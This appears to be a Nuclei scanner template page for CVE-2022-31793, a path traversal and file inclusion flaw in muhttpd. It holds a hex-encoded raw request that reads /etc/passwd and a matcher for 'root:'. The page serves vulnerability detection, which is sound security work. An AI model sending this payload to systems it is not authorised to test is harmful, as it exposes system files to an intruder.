muhttpd <=1.1.5 - Local Inclusion
ID: CVE-2022-31793
Severity: high
Author: scent2d
Tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcp
Description
Section titled “Description”muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.
YAML Source
Section titled “YAML Source”id: CVE-2022-31793
info: name: muhttpd <=1.1.5 - Local Inclusion author: scent2d severity: high description: | muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system. impact: | An attacker can exploit this vulnerability to read sensitive files on the system. remediation: Update the application to version 1.10 reference: - https://derekabdine.com/blog/2022-arris-advisory.html - https://nvd.nist.gov/vuln/detail/CVE-2022-31793 - https://derekabdine.com/blog/2022-arris-advisory - https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/millions-of-arris-routers-are-vulnerable-to-path-traversal-attacks/ - http://inglorion.net/software/muhttpd/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-31793 cwe-id: CWE-22 epss-score: 0.25241 epss-percentile: 0.96539 cpe: cpe:2.3:a:inglorion:muhttpd:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: inglorion product: muhttpd tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion,tcptcp: - host: - "{{Hostname}}" inputs: - data: "47455420612F6574632F706173737764" type: hex
- data: "\n\n" read-size: 128 matchers: - type: word part: body encoding: hex words: - "726f6f743a"# digest: 490a004630440220512c8dd36420336a5bed971e3cf53ce57d0a625f0beb6e78859fe0a1f01902d2022047457613108a2575805e11a02df50cd18ce0b2d4c24b36464a048fd9629de11e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "network/cves/2022/CVE-2022-31793.yaml"